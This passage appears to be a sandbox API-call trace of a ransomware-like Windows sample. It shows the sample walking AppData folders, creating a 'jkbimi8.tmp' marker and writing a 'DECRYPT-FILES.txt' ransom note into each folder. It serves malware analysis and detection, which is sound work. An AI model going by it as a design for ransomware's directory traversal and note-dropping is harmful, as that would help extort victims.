69 [0088.144] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*" [0088.144] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.144] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.144] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.144] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.144] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.144] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.144] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\" [0088.144] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp" [0088.144] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.144] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Network Shortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\network shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.144] CloseHandle (hObject=0x0) returned 0 [0088.144] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.145] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.145] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.145] CloseHandle (hObject=0x440) returned 1 [0088.145] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfda27f60, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xb9c40b55, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Printer Shortcuts", cAlternateFileName="PRINTE~1")) returned 1 [0088.145] lstrcmpW (lpString1="Printer Shortcuts", lpString2=".") returned 1 [0088.145] lstrcmpW (lpString1="Printer Shortcuts", lpString2="..") returned 1 [0088.145] lstrcatW (in: lpString1="Printer Shortcuts", lpString2="\\" | out: lpString1="Printer Shortcuts\\") returned="Printer Shortcuts\\" [0088.145] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Printer Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0088.145] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\jkbimi8.tmp") returned 81 [0088.145] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.145] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 69 [0088.145] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.145] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt") returned 87 [0088.146] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.146] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.147] CloseHandle (hObject=0x444) returned 1 [0088.147] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned 69 [0088.147] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*" [0088.147] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.147] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.147] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.147] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.147] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.147] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.148] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\" [0088.148] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp" [0088.148] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.148] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Printer Shortcuts\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\printer shortcuts\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.148] CloseHandle (hObject=0x0) returned 0 [0088.148] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.148] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.148] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.148] CloseHandle (hObject=0x440) returned 1 [0088.148] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PrivacIE", cAlternateFileName="")) returned 1 [0088.148] lstrcmpW (lpString1="PrivacIE", lpString2=".") returned 1 [0088.148] lstrcmpW (lpString1="PrivacIE", lpString2="..") returned 1 [0088.149] lstrcatW (in: lpString1="PrivacIE", lpString2="\\" | out: lpString1="PrivacIE\\") returned="PrivacIE\\" [0088.149] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="PrivacIE\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0088.149] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\jkbimi8.tmp") returned 72 [0088.149] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.149] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 60 [0088.149] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.149] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt") returned 78 [0088.149] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.149] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.150] CloseHandle (hObject=0x444) returned 1 [0088.150] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned 60 [0088.150] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*" [0088.151] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.151] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.151] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.151] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.151] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.151] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0bbe320, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0bbe320, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0bbe320, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.151] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\" [0088.151] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp" [0088.151] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.151] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.151] CloseHandle (hObject=0x0) returned 0 [0088.151] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.152] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0088.152] lstrcmpW (lpString1="Low", lpString2=".") returned 1 [0088.152] lstrcmpW (lpString1="Low", lpString2="..") returned 1 [0088.152] lstrcatW (in: lpString1="Low", lpString2="\\" | out: lpString1="Low\\") returned="Low\\" [0088.152] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\", lpString2="Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0088.152] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\jkbimi8.tmp") returned 76 [0088.152] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0088.152] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 64 [0088.152] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.153] wsprintfW (in: param_1=0x3f2dcc4, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt") returned 82 [0088.153] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0088.153] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2dcc0, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2dcc0*=0x23fc, lpOverlapped=0x0) returned 1 [0088.154] CloseHandle (hObject=0x44c) returned 1 [0088.154] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned 64 [0088.154] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*" [0088.154] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\*", lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0088.154] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.154] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.154] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.154] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.154] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.154] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\" [0088.154] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp" [0088.154] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.155] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\PrivacIE\\Low\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\privacie\\low\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.155] CloseHandle (hObject=0x0) returned 0 [0088.155] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.155] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.155] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.155] CloseHandle (hObject=0x448) returned 1 [0088.155] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x62fa4a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xedd0e6f6, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0088.155] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.155] CloseHandle (hObject=0x440) returned 1 [0088.155] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, 